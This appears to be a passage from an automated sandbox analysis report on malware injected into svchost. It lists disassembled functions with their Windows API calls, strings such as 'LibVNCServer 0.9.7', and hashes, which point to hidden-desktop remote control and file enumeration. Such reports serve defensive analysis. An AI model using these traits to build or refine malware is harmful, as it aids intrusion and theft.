malloc.MSVCRT ref: 02D01A1F
free.MSVCRT(02D065E8), ref: 02D01A48
exit.MSVCRT ref: 02D01A53
memcpy.MSVCRT ref: 02D01A63
free.MSVCRT(02D065E8), ref: 02D01A83

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: free$exitmallocmemcpy
String ID:
API String ID: 2377537114-0
Opcode ID: c3e1cac3992b6f51c2a3e730fda7ea536fdb36b4e5f5db19ad530fcd16bce686
Instruction ID: fa0fa4e10ddb7ffce0a2383db2ea067c1ed6fe02e2a38457e5c1dd1b6ec8ea36
Opcode Fuzzy Hash: c3e1cac3992b6f51c2a3e730fda7ea536fdb36b4e5f5db19ad530fcd16bce686
Instruction Fuzzy Hash: 3C219FB4A042059FC714CF5AE8C4B6ABBE5FB49304F10852DE94AC3350D731E961CB90

Function 02D056F0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02D05712
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D05745
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D05771
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D05798
SetLastError.KERNEL32(?), ref: 02D057B4

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: 8a8d29310e388635e4616cc8cd80effc35e9b4385d7cd5936b67d4402fdd7205
Instruction ID: 362a6e4a406773aae4c6e7ec69cdf81a2048000aac9fda2b8819d73c3da491a9
Opcode Fuzzy Hash: 8a8d29310e388635e4616cc8cd80effc35e9b4385d7cd5936b67d4402fdd7205
Instruction Fuzzy Hash: 6C3187B5D41219AFDB40CFA8E985AEEBBF5FB48310F50846AE914E7300E77499548FA0

Function 02D06999 Relevance: 7.6, APIs: 5, Instructions: 54memoryregistrystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02D069FA
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02D06A01
memset.MSVCRT ref: 02D06A15
lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02D06A2E
RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02D06A3C

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseProcesslstrcpynmemset
String ID:
API String ID: 3057210225-0
Opcode ID: 0c5125790d08e82d51e3ac57a4ab0e725048cc32ff00b5d8c73df7f9a54a0493
Instruction ID: 259001db075d581fb4302807d4229ccf1db745ea899863a3552ee2a9519e97a3
Opcode Fuzzy Hash: 0c5125790d08e82d51e3ac57a4ab0e725048cc32ff00b5d8c73df7f9a54a0493
Instruction Fuzzy Hash: F3114871E4522817E729EB74A8897D933D8EB1CB04F4008A9FA45D67D0D3B0CEE08AE1

Function 02D0D060 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 02D0D072
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02D0D089
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D0D09F
CloseHandle.KERNEL32(00000000), ref: 02D0D0B0
ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02D0D0C7

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
String ID:
API String ID: 1270303404-0
Opcode ID: ad73a559cecad126e4acb97d08059afaead1a085dc4ee9ae5470dddf5ecfe95c
Instruction ID: 929cf42afc6371402c7eb039f8d4d33dfa5a52333a51e45f0c2ea9ba31a92ebb
Opcode Fuzzy Hash: ad73a559cecad126e4acb97d08059afaead1a085dc4ee9ae5470dddf5ecfe95c
Instruction Fuzzy Hash: 4D01D139941218BBE720DF90AC49FEE7BE8EB15704F900184FA04AA2C0D7F01E40CBE1

Function 02D1A1B0 Relevance: 7.5, APIs: 5, Instructions: 41memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,00000000,02D1A193,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A1BC
GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A1C6
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A1CD
memset.MSVCRT ref: 02D1A1DE
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A22A

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocMutexObjectProcessReleaseSingleWaitmemset
String ID:
API String ID: 819421891-0
Opcode ID: 1bebc3f6613ab648073eef041146847bcdb8402efba0e2f49b1989ccceda45fc
Instruction ID: 5c1af01cc76bb69b7798fb57e124c1aca5b686c4b9bc692899b95b0d0a8886b8
Opcode Fuzzy Hash: 1bebc3f6613ab648073eef041146847bcdb8402efba0e2f49b1989ccceda45fc
Instruction Fuzzy Hash: B70117B9E41B11AFC324CF68E584A06BBF4FF58700B108A1AE98997B50C770F950CF94

Function 02D0E0E0 Relevance: 7.5, APIs: 5, Instructions: 37threadwindowCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32(?,?,00000000,75923080,?,02D08F3C,?,00000006,00000000), ref: 02D0E0EC
GetWindow.USER32(00000000,00000005), ref: 02D0E103
GetWindow.USER32(00000000), ref: 02D0E106
SendMessageA.USER32(00000000,00000006,?,02D08F3C), ref: 02D0E11D
GetWindow.USER32(00000000,00000003), ref: 02D0E122

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$DesktopMessageSendThread
String ID:
API String ID: 3855296974-0
Opcode ID: 7cad666cb8e22e09e4b4820e09919031e93ebc53b1172ec2f6504f3815fbc9d4
Instruction ID: 8f528b863c00f9a551baf88c33398d8e8867368fd7a106b2a6234af2d85bb1a7
Opcode Fuzzy Hash: 7cad666cb8e22e09e4b4820e09919031e93ebc53b1172ec2f6504f3815fbc9d4
Instruction Fuzzy Hash: 42F0897AA403147FD721AF55EC88E9BB39CDBD8764F014905F90097340D6B0ED508AB0

Function 02D0D0E0 Relevance: 7.5, APIs: 5, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 02D0D0EC
GetCurrentThreadId.KERNEL32 ref: 02D0D0F4
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02D0D100
SendMessageA.USER32(?,0000000D,?,?), ref: 02D0D111
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02D0D11D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
String ID:
API String ID: 2643679612-0
Opcode ID: 7ab1dafeed046c2581a53a039b89beded1af0823ab146aec5d3ba33ddc878222
Instruction ID: b2a496f5b9b2da6e1fd8a69579672249495607edda6aa3718fb542da70d9deb8
Opcode Fuzzy Hash: 7ab1dafeed046c2581a53a039b89beded1af0823ab146aec5d3ba33ddc878222
Instruction Fuzzy Hash: 1CF037366403047BE7105FA5FC8DF9BBBACEB99761F404415FA09DB341C5B19C108A70

Function 02D0E0A0 Relevance: 7.5, APIs: 5, Instructions: 30threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 02D0E0AA
GetCurrentThreadId.KERNEL32 ref: 02D0E0B2
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02D09CD4,?,?,?,?,02D091A0,?,?), ref: 02D0E0C4
GetFocus.USER32 ref: 02D0E0C6
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02D09CD4,?,?,?,?,02D091A0,?,?), ref: 02D0E0D3

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Thread$AttachInput$CurrentFocusProcessWindow
String ID:
API String ID: 968181190-0
Opcode ID: 131223735ed0c631ff8002bf4a6c1a2445df188889a0cd20e84e890fdd7aa5bd
Instruction ID: f2d0017aadd0ec9e9d356ce563ad0704cbad1bceb8484d21e2bceace556da516
Opcode Fuzzy Hash: 131223735ed0c631ff8002bf4a6c1a2445df188889a0cd20e84e890fdd7aa5bd
Instruction Fuzzy Hash: 86E09235A40204BBD6105BA6BC4DF9FBBECDB86762F900455FA08D7341D6719C1086A0

Function 02D0C220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 02D0DA30: GetClassNameA.USER32(?,?,00000101), ref: 02D0DA46

GetWindowInfo.USER32(?,?), ref: 02D0C254
SetWindowLongA.USER32(?,000000EC,?), ref: 02D0C276
SetLayeredWindowAttributes.USER32(?,0000FFFF,000000FF,00000002), ref: 02D0C289

Strings

<, xrefs: 02D0C24D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$AttributesClassInfoLayeredLongName
String ID: <
API String ID: 195909263-4251816714
Opcode ID: ee1ce7ada1504de19eaa462a3109e998f0668dc212d9fc3d727a2cf5fea678c1
Instruction ID: 4682b25a8765ad5bd6908d70dd57119a9920fff1d664d423ec28c26163e088cd
Opcode Fuzzy Hash: ee1ce7ada1504de19eaa462a3109e998f0668dc212d9fc3d727a2cf5fea678c1
Instruction Fuzzy Hash: F2F0F430AA41156BD764AEF4E885B7E37ACEB05B40F504629F805E5BE0EB508C24CA65

Function 02D1E600 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON

Download Yara Rule

APIs

Part of subcall function 02D1E1B0: memset.MSVCRT ref: 02D1E1CF
Part of subcall function 02D1E1B0: memset.MSVCRT ref: 02D1E1F1
Part of subcall function 02D1E1B0: GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D1E206
Part of subcall function 02D1E1B0: SetErrorMode.KERNEL32(00000001), ref: 02D1E21F
Part of subcall function 02D1E1B0: GetDriveTypeA.KERNEL32(?), ref: 02D1E268
Part of subcall function 02D1E1B0: SetCurrentDirectoryA.KERNEL32(?), ref: 02D1E27B
Part of subcall function 02D1E1B0: FindFirstFileA.KERNEL32(?,?), ref: 02D1E2DD
Part of subcall function 02D1E1B0: SetErrorMode.KERNEL32(?), ref: 02D1E5F3

PathAddBackslashA.SHLWAPI(5C5905E0), ref: 02D1E60B

Part of subcall function 02D13590: EnterCriticalSection.KERNEL32(02D4FB68,?,5C590552,74E1A250), ref: 02D135A9
Part of subcall function 02D13590: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02D135BB
Part of subcall function 02D13590: _snprintf.MSVCRT ref: 02D135DB
Part of subcall function 02D13590: SetCurrentDirectoryA.KERNEL32(?), ref: 02D135EB
Part of subcall function 02D13590: PathAddBackslashA.SHLWAPI(?), ref: 02D136C0

Strings

5C5905E0, xrefs: 02D1E606, 02D1E616
\t, xrefs: 02D1E60B
COLV, xrefs: 02D1E611

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$BackslashDriveErrorModePathmemset$CriticalEnterFileFindFirstLogicalSectionStringsType_snprintf
String ID: 5C5905E0$COLV$\t
API String ID: 2461973751-3781273733
Opcode ID: 603961eb2e4944634c4d40d47f98737c27d6f7bfca3ab39ac1e70a726b845e0e
Instruction ID: 2f04d16c520405e39fd7eecd7e6472b382b6455d6f87a7de86067c2b6b9f0d8d
Opcode Fuzzy Hash: 603961eb2e4944634c4d40d47f98737c27d6f7bfca3ab39ac1e70a726b845e0e
Instruction Fuzzy Hash: 6FB09271AE031077B9083BB4780EC1927318884E02720494A7C1314B444DD26C989B36

Function 02D02ED8 Relevance: 6.5, APIs: 5, Instructions: 228COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,00000000,?,?,00000000,00000000), ref: 02D030EF
free.MSVCRT(00000000), ref: 02D03113
free.MSVCRT(?), ref: 02D03134

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: fe35da5f700e3c7978334e728a56664bfb8f0d2b713db6921a8dc07ce7ef2ce8
Instruction ID: bd26ef75e2b989f604ad71577fb01991d07a7191d8ac721447abee9b93150f65
Opcode Fuzzy Hash: fe35da5f700e3c7978334e728a56664bfb8f0d2b713db6921a8dc07ce7ef2ce8
Instruction Fuzzy Hash: AA8148B1A0120A9BDF20CF49C588BAEB7A1BF88354F2445A8ED05A73A0D771DD51CB91

Function 02D34A60 Relevance: 6.2, APIs: 4, Instructions: 248COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02D34AB9
realloc.MSVCRT ref: 02D34AC5
malloc.MSVCRT ref: 02D34AEB
realloc.MSVCRT ref: 02D34AF7

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: mallocrealloc
String ID:
API String ID: 948496778-0
Opcode ID: 54b983d85313a34d282b692f7f3d2d49a9e935692293a732afc43f9d728e7eb5
Instruction ID: 66bcc6c81fcce02c7667a99a3aa9ee4fa7c21cef9448ce7ba7301103ee99bd6d
Opcode Fuzzy Hash: 54b983d85313a34d282b692f7f3d2d49a9e935692293a732afc43f9d728e7eb5
Instruction Fuzzy Hash: 6091D276E0025A8FDB05CF24D880AEA3BA6FF94311F0445B9ED099B345D778AD12CBB0

Function 02D2B150 Relevance: 6.2, APIs: 4, Instructions: 248COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02D2B1A9
realloc.MSVCRT ref: 02D2B1B5
malloc.MSVCRT ref: 02D2B1DB
realloc.MSVCRT ref: 02D2B1E7

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: mallocrealloc
String ID:
API String ID: 948496778-0
Opcode ID: cbe8724e741dea81c3f357b467e16f414f98cb8870023a3523d5c5a5d6099a00
Instruction ID: d205dc200a56f0c38a250cdf8298c30acd666c83a95f23426561329644b6abc2
Opcode Fuzzy Hash: cbe8724e741dea81c3f357b467e16f414f98cb8870023a3523d5c5a5d6099a00
Instruction Fuzzy Hash: CB91EB75E002698FDB04DF14D880BAA37A6FF64309F0485BAED0D9B355D6B4AD16CBB0

Function 02D301D0 Relevance: 6.1, APIs: 4, Instructions: 146COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 02D301FB
closesocket.WS2_32(?), ref: 02D30260
closesocket.WS2_32(?), ref: 02D302D0
closesocket.WS2_32(?), ref: 02D30340

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: b78f14235e96ffe9348fcde2b38afe4fce3cd029a736c93060b395cba33ca5e3
Instruction ID: 23ffef1a8248f7efd636ff7feb9666a2221072734a702e4243b162742972bd00
Opcode Fuzzy Hash: b78f14235e96ffe9348fcde2b38afe4fce3cd029a736c93060b395cba33ca5e3
Instruction Fuzzy Hash: 6951E074100B019BD726CB28C8947E6B3E6FB95329F74CA59C4AB87394EB31E946CB50

Function 02D2D330 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D2D362

Strings

%s (%s), xrefs: 02D2D35C
LibVNCServer 0.9.7, xrefs: 02D2D350
unknown, xrefs: 02D2D34B, 02D2D355

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s (%s)$LibVNCServer 0.9.7$unknown
API String ID: 2111968516-696653274
Opcode ID: 79806d29a9da903e97545075ebecbed22e28306307d79f51ee026a23d2da4413
Instruction ID: 2e02ef642d5bc3b2dc3dc3a5c5c76afd55e6d82b2a6e61a2ee9b881aff341e83
Opcode Fuzzy Hash: 79806d29a9da903e97545075ebecbed22e28306307d79f51ee026a23d2da4413
Instruction Fuzzy Hash: 4D41D631A0025A8FDB05CF28C9A4BE677A6EF55309F1481F5DD4D9F306D674AA0ECBA0

Function 02D07AB9 Relevance: 6.1, APIs: 4, Instructions: 78memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,7591F380), ref: 02D07B2D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,7591F380), ref: 02D07B34
memset.MSVCRT ref: 02D07B43
RegCloseKey.ADVAPI32(?,?,?,?,?,7591F380), ref: 02D07B73

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseProcessmemset
String ID:
API String ID: 2501364573-0
Opcode ID: 26d615f3cdf23af627fd1e2c0d8a963a124de75c4d122e149993d81568bfa96a
Instruction ID: ed3a2ca186ae5c4d9196b59ad50c9958860d69f0bfc93ce84a1daafc03ef37da
Opcode Fuzzy Hash: 26d615f3cdf23af627fd1e2c0d8a963a124de75c4d122e149993d81568bfa96a
Instruction Fuzzy Hash: 86213E32A040585FE7259A749CD8BEAF7DAEB59300F5409B8D686DB3A0D330AD84C7A0

Function 02D12060 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D12082
GetParent.USER32(?), ref: 02D1208E
GetWindowTextW.USER32(00000000,?,00000104), ref: 02D120A5
StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02D120C6

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ParentTextWindowmemset
String ID:
API String ID: 4175915554-0
Opcode ID: 56e356ab64469f9ae7e9f3f18f1f2f7c99e07e36ef847f425bf9e859b04da032
Instruction ID: b55b5b5bed31bb999045fd6b8fbb57004014922f29f238bc7fab789b97c4362a
Opcode Fuzzy Hash: 56e356ab64469f9ae7e9f3f18f1f2f7c99e07e36ef847f425bf9e859b04da032
Instruction Fuzzy Hash: A901C076B4022427D7209E69ACCCA9BF3ACAB54650F50427ABD18E3300EA719D94C6A0

Function 02D189E0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,?,?,00000000,?,?,02D18FB5,?), ref: 02D189F3

Part of subcall function 02D13D20: GetProcessHeap.KERNEL32(00000008,?,00000000,?,02D25213), ref: 02D13D31
Part of subcall function 02D13D20: HeapAlloc.KERNEL32(00000000), ref: 02D13D38
Part of subcall function 02D13D20: memset.MSVCRT ref: 02D13D48

memcpy.MSVCRT ref: 02D18A0E

Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06DA1
Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06DB4
Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06DC7
Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06DDA
Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06DED
Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06E00
Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06E13
Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06E26
Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06E39
Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06E4C
Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06E5F
Part of subcall function 02D06D40: isdigit.MSVCRT ref: 02D06E72

Part of subcall function 02D1DCA0: memset.MSVCRT ref: 02D1DCC1
Part of subcall function 02D1DCA0: StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02D1DCF9
Part of subcall function 02D1DCA0: PathAddBackslashA.SHLWAPI(5C590552), ref: 02D1DD2D
Part of subcall function 02D1DCA0: PathAddBackslashA.SHLWAPI(5C590552), ref: 02D1DD63
Part of subcall function 02D1DCA0: PathFileExistsA.SHLWAPI(00000000), ref: 02D1DDA9

Part of subcall function 02D240E0: strstr.MSVCRT ref: 02D24123
Part of subcall function 02D240E0: strstr.MSVCRT ref: 02D24136
Part of subcall function 02D240E0: strstr.MSVCRT ref: 02D24149
Part of subcall function 02D240E0: PathAddBackslashA.SHLWAPI(02D5D2A0), ref: 02D24177
Part of subcall function 02D240E0: PathAddBackslashA.SHLWAPI(02D5D2A0), ref: 02D241AD
Part of subcall function 02D240E0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02D2420D

Strings

GET , xrefs: 02D18A31
POST, xrefs: 02D18A38

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: isdigit$Path$Backslash$strstr$Heapmemset$AllocCreateDirectoryExistsFileProcessReadmemcpy
String ID: GET $POST
API String ID: 1864109261-2494278042
Opcode ID: 05d3b8718a856b85bd44ed2323191ac212921b89f383e5f370d6d179d1455a3f
Instruction ID: 7b38018442d01bedcfa4e79dc3e89805746339714a5b8940ca0e743af6a986cc
Opcode Fuzzy Hash: 05d3b8718a856b85bd44ed2323191ac212921b89f383e5f370d6d179d1455a3f
Instruction Fuzzy Hash: 21F0F4315095203BA731EA51BCC4F9F7A9ECD92644B084419F905D2B41DB20EC81EAB5

Function 02D0CB10 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02D0C8C0: IsWindowVisible.USER32(02D0D04D), ref: 02D0C8DF
Part of subcall function 02D0C8C0: GetWindowInfo.USER32(02D0D04D,?), ref: 02D0C8F9
Part of subcall function 02D0C8C0: GetClassLongA.USER32(02D0D04D,000000E6), ref: 02D0C94E
Part of subcall function 02D0C8C0: PrintWindow.USER32(02D0D04D,?,00000000), ref: 02D0C967

memset.MSVCRT ref: 02D0CB41

Part of subcall function 02D0CA20: GetWindowRect.USER32(02D0CB54,00000000), ref: 02D0CA2F
Part of subcall function 02D0CA20: GetWindowLongA.USER32(02D0CB54,000000F0), ref: 02D0CA49
Part of subcall function 02D0CA20: GetScrollBarInfo.USER32(02D0CB54,000000FA,?), ref: 02D0CA64
Part of subcall function 02D0CA20: GetScrollBarInfo.USER32(02D0CB54,000000FB,0000003C), ref: 02D0CA91

GetWindow.USER32(02D0D04D,00000005), ref: 02D0CB5C
GetWindow.USER32(00000000), ref: 02D0CB5F

Part of subcall function 02D0CB10: GetWindow.USER32(02D0D04D,00000003), ref: 02D0CB6A

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
